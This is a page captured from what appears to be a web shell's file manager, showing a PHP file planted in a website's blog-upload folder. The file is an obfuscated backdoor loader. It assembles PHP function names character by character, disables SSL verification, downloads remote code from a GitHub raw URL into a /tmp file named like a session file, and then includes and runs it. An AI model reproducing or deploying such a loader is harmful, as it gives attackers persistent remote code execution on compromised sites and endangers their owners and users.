D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
shubmkcj
/
designpitara.com
/
admin
/
blogs
/
blogs-files
/
Filename :
1733109837.php
back
Copy
<?php $fgc = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $fw = "f" . "w" . "r" . "i" . "t" . "e"; $fo = "f" . "o" . "p" . "e" . "n"; $fc = "f" . "c" . "l" . "o" . "s" . "e"; $tmpfile = 'sess_' . md5('naxtarrr') . '.php'; $data = ['https://raw.githubusercontent.com/DamnSec/x/refs/heads/main/1.txt', "/tmp/$tmpfile"]; if (!file_exists($data[1]) || filesize($data[1]) === 0) { $context = stream_context_create([ "ssl" => [ "verify_peer" => false, "verify_peer_name" => false, ], ]); $fopen = $fo($data[1], 'w+'); $fw($fopen, $fgc($data[0], false, $context)); $fc($fopen); } include($data[1]);